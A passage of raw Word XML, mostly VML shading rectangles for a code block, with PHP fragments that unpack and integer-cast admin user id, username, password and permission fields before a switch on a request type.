            <v:rect id="_x0000_s7107" style="position:absolute;left:1617;top:3581;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7106" style="position:absolute;left:1797;top:3644;width:2651;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7105" style="position:absolute;left:4448;top:3644;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7104" style="position:absolute;left:4568;top:3644;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7103" style="position:absolute;left:4689;top:3644;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7102" style="position:absolute;left:4809;top:3644;width:3013;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7101" style="position:absolute;left:1617;top:3907;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7100" style="position:absolute;left:1797;top:3970;width:2771;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7099" style="position:absolute;left:4568;top:3970;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7098" style="position:absolute;left:4689;top:3970;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7097" style="position:absolute;left:4809;top:3970;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7096" style="position:absolute;left:4930;top:3970;width:3133;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7095" style="position:absolute;left:1617;top:4233;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7094" style="position:absolute;left:1797;top:4296;width:2169;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7093" style="position:absolute;left:3966;top:4296;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7092" style="position:absolute;left:4086;top:4296;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7091" style="position:absolute;left:4207;top:4296;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7090" style="position:absolute;left:4327;top:4296;width:2531;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7089" style="position:absolute;left:1617;top:4559;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7088" style="position:absolute;left:1617;top:4885;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7087" style="position:absolute;left:1797;top:4948;width:241;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7086" style="position:absolute;left:2038;top:4948;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7085" style="position:absolute;left:2158;top:4948;width:1205;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7084" style="position:absolute;left:3363;top:4948;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7083" style="position:absolute;left:3484;top:4948;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7082" style="position:absolute;left:1617;top:5211;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7081" style="position:absolute;left:1797;top:5274;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7080" style="position:absolute;left:1897;top:5274;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7079" style="position:absolute;left:1997;top:5274;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7078" style="position:absolute;left:2097;top:5274;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7077" style="position:absolute;left:2197;top:5274;width:241;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7076" style="position:absolute;left:2438;top:5274;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7075" style="position:absolute;left:2558;top:5274;width:3254;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7074" style="position:absolute;left:5812;top:5274;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7073" style="position:absolute;left:5932;top:5274;width:241;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7072" style="position:absolute;left:6173;top:5274;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7071" style="position:absolute;left:1617;top:5537;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7070" style="position:absolute;left:1797;top:5600;width:3494;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7069" style="position:absolute;left:5291;top:5600;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7068" style="position:absolute;left:5412;top:5600;width:241;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7067" style="position:absolute;left:5653;top:5600;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7066" style="position:absolute;left:5773;top:5600;width:1928;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7065" style="position:absolute;left:7701;top:5600;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7064" style="position:absolute;left:7822;top:5600;width:241;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7063" style="position:absolute;left:8063;top:5600;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7062" style="position:absolute;left:1617;top:5863;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7061" style="position:absolute;left:1797;top:5926;width:2410;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7060" style="position:absolute;left:4207;top:5926;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7059" style="position:absolute;left:4327;top:5926;width:241;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7058" style="position:absolute;left:4568;top:5926;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7057" style="position:absolute;left:4689;top:5926;width:2289;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7056" style="position:absolute;left:6978;top:5926;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7055" style="position:absolute;left:7099;top:5926;width:241;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7054" style="position:absolute;left:7340;top:5926;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7053" style="position:absolute;left:1617;top:6189;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7052" style="position:absolute;left:1797;top:6252;width:2289;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7051" style="position:absolute;left:4086;top:6252;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7050" style="position:absolute;left:4207;top:6252;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7049" style="position:absolute;left:1617;top:6515;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7048" style="position:absolute;left:1797;top:6578;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7047" style="position:absolute;left:1897;top:6578;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7046" style="position:absolute;left:1997;top:6578;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7045" style="position:absolute;left:2097;top:6578;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7044" style="position:absolute;left:2197;top:6578;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7043" style="position:absolute;left:2297;top:6578;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7042" style="position:absolute;left:2397;top:6578;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7041" style="position:absolute;left:2497;top:6578;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7040" style="position:absolute;left:2597;top:6578;width:1205;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7039" style="position:absolute;left:3802;top:6578;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7038" style="position:absolute;left:3922;top:6578;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7037" style="position:absolute;left:4043;top:6578;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7036" style="position:absolute;left:4163;top:6578;width:241;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7035" style="position:absolute;left:1617;top:6841;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7034" style="position:absolute;left:1797;top:6904;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7033" style="position:absolute;left:1897;top:6904;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7032" style="position:absolute;left:1997;top:6904;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7031" style="position:absolute;left:2097;top:6904;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7030" style="position:absolute;left:2197;top:6904;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7029" style="position:absolute;left:2317;top:6904;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7028" style="position:absolute;left:2438;top:6904;width:482;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7027" style="position:absolute;left:2920;top:6904;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7026" style="position:absolute;left:3040;top:6904;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7025" style="position:absolute;left:1617;top:7167;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7024" style="position:absolute;left:1797;top:7230;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7023" style="position:absolute;left:1897;top:7230;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7022" style="position:absolute;left:1997;top:7230;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7021" style="position:absolute;left:2097;top:7230;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7020" style="position:absolute;left:2197;top:7230;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7019" style="position:absolute;left:2297;top:7230;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7018" style="position:absolute;left:2397;top:7230;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7017" style="position:absolute;left:2497;top:7230;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7016" style="position:absolute;left:2597;top:7230;width:1205;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7015" style="position:absolute;left:3802;top:7230;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7014" style="position:absolute;left:3922;top:7230;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7013" style="position:absolute;left:4043;top:7230;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7012" style="position:absolute;left:4163;top:7230;width:241;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7011" style="position:absolute;left:1617;top:7493;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:shape id="_x0000_s7010" type="#_x0000_t75" style="position:absolute;left:1797;top:7556;width:520;height:200">
              <v:imagedata r:id="rId68" o:title=""/>
            </v:shape>
            <v:rect id="_x0000_s7009" style="position:absolute;left:1617;top:7819;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7008" style="position:absolute;left:1797;top:7882;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7007" style="position:absolute;left:1917;top:7882;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7006" style="position:absolute;left:2038;top:7882;width:482;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7005" style="position:absolute;left:2520;top:7882;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7004" style="position:absolute;left:2640;top:7882;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7003" style="position:absolute;left:1617;top:8145;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7002" style="position:absolute;left:1797;top:8208;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7001" style="position:absolute;left:1897;top:8208;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7000" style="position:absolute;left:1997;top:8208;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6999" style="position:absolute;left:2097;top:8208;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6998" style="position:absolute;left:2197;top:8208;width:241;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6997" style="position:absolute;left:2438;top:8208;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6996" style="position:absolute;left:2558;top:8208;width:3254;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6995" style="position:absolute;left:5812;top:8208;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6994" style="position:absolute;left:5932;top:8208;width:241;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6993" style="position:absolute;left:6173;top:8208;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6992" style="position:absolute;left:1617;top:8471;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6991" style="position:absolute;left:1797;top:8534;width:3494;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6990" style="position:absolute;left:5291;top:8534;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6989" style="position:absolute;left:5412;top:8534;width:241;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6988" style="position:absolute;left:5653;top:8534;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6987" style="position:absolute;left:1617;top:8797;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6986" style="position:absolute;left:1797;top:8860;width:2289;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6985" style="position:absolute;left:4086;top:8860;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6984" style="position:absolute;left:4207;top:8860;width:241;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6983" style="position:absolute;left:4448;top:8860;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6982" style="position:absolute;left:4568;top:8860;width:2290;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6981" style="position:absolute;left:6858;top:8860;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6980" style="position:absolute;left:6978;top:8860;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6979" style="position:absolute;left:1617;top:9123;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6978" style="position:absolute;left:1797;top:9186;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6977" style="position:absolute;left:1897;top:9186;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6976" style="position:absolute;left:1997;top:9186;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6975" style="position:absolute;left:2097;top:9186;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6974" style="position:absolute;left:2197;top:9186;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6973" style="position:absolute;left:2297;top:9186;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6972" style="position:absolute;left:2397;top:9186;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6971" style="position:absolute;left:2497;top:9186;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6970" style="position:absolute;left:2597;top:9186;width:1205;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6969" style="position:absolute;left:3802;top:9186;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6968" style="position:absolute;left:3922;top:9186;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6967" style="position:absolute;left:4043;top:9186;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6966" style="position:absolute;left:4163;top:9186;width:241;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6965" style="position:absolute;left:1617;top:9449;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6964" style="position:absolute;left:1797;top:9512;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6963" style="position:absolute;left:1897;top:9512;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6962" style="position:absolute;left:1997;top:9512;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6961" style="position:absolute;left:2097;top:9512;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6960" style="position:absolute;left:2197;top:9512;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6959" style="position:absolute;left:2317;top:9512;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6958" style="position:absolute;left:2438;top:9512;width:482;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6957" style="position:absolute;left:2920;top:9512;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6956" style="position:absolute;left:3040;top:9512;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6955" style="position:absolute;left:1617;top:9775;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6954" style="position:absolute;left:1797;top:9838;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6953" style="position:absolute;left:1897;top:9838;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6952" style="position:absolute;left:1997;top:9838;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6951" style="position:absolute;left:2097;top:9838;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6950" style="position:absolute;left:2197;top:9838;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6949" style="position:absolute;left:2297;top:9838;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6948" style="position:absolute;left:2397;top:9838;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6947" style="position:absolute;left:2497;top:9838;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6946" style="position:absolute;left:2597;top:9838;width:1205;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6945" style="position:absolute;left:3802;top:9838;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6944" style="position:absolute;left:3922;top:9838;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6943" style="position:absolute;left:4043;top:9838;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6942" style="position:absolute;left:4163;top:9838;width:241;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6941" style="position:absolute;left:1617;top:10101;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:shape id="_x0000_s6940" type="#_x0000_t75" style="position:absolute;left:1797;top:10164;width:520;height:200">
              <v:imagedata r:id="rId60" o:title=""/>
            </v:shape>
            <v:rect id="_x0000_s6939" style="position:absolute;left:1617;top:10427;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6938" style="position:absolute;left:1797;top:10490;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6937" style="position:absolute;left:1617;top:10753;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6936" style="position:absolute;left:1797;top:10816;width:241;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6935" style="position:absolute;left:2038;top:10816;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6934" style="position:absolute;left:2158;top:10816;width:1326;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6933" style="position:absolute;left:3484;top:10816;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6932" style="position:absolute;left:3604;top:10816;width:241;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6931" style="position:absolute;left:3845;top:10816;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6930" style="position:absolute;left:3966;top:10816;width:241;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6929" style="position:absolute;left:4207;top:10816;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6928" style="position:absolute;left:4327;top:10816;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6927" style="position:absolute;left:1617;top:11079;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6926" style="position:absolute;left:1617;top:11405;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6925" style="position:absolute;left:1797;top:11468;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6924" style="position:absolute;left:1897;top:11468;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6923" style="position:absolute;left:1997;top:11468;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6922" style="position:absolute;left:2097;top:11468;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6921" style="position:absolute;left:2197;top:11468;width:241;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6920" style="position:absolute;left:2438;top:11468;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6919" style="position:absolute;left:2558;top:11468;width:3615;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6918" style="position:absolute;left:6173;top:11468;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6917" style="position:absolute;left:6294;top:11468;width:482;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6916" style="position:absolute;left:6776;top:11468;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6915" style="position:absolute;left:6896;top:11468;width:241;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6914" style="position:absolute;left:7137;top:11468;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6913" style="position:absolute;left:1617;top:11731;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6912" style="position:absolute;left:1797;top:11794;width:1325;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6911" style="position:absolute;left:3122;top:11794;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6910" style="position:absolute;left:3243;top:11794;width:241;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6909" style="position:absolute;left:3484;top:11794;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6908" style="position:absolute;left:3604;top:11794;width:3374;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6907" style="position:absolute;left:6978;top:11794;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6906" style="position:absolute;left:7099;top:11794;width:482;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6905" style="position:absolute;left:7581;top:11794;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6904" style="position:absolute;left:7701;top:11794;width:241;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6903" style="position:absolute;left:7942;top:11794;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6902" style="position:absolute;left:1617;top:12057;width:6745;height:506" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6901" style="position:absolute;left:1797;top:12120;width:964;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6900" style="position:absolute;left:2761;top:12120;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6899" style="position:absolute;left:2881;top:12120;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <w10:wrap anchorx="page" anchory="page"/>
          </v:group>
        </w:pic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6897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ed="f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list(</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>$esp_adminuserid, $this-&gt;esp_username,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$this-&gt;esp_password, $this-&gt;esp_useragent,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-6"/>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>$esp_powerid, $esp_inputclassid, $this-&gt;esp_softurl)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$arr_purview;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8"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Times New Roman"/>
                      <w:sz w:val="27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$this-&gt;</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t xml:space="preserve">esp_adminuserid = </w:t>
                  </w:r>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>intval(</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>$esp_adminuserid);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 xml:space="preserve">$this-&gt;esp_inputclassid = </w:t>
                  </w:r>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>intval(</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>$esp_inputclassid);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 xml:space="preserve">$this-&gt;esp_powerid = </w:t>
                  </w:r>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>intval(</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>$esp_powerid);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($gettype) {</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
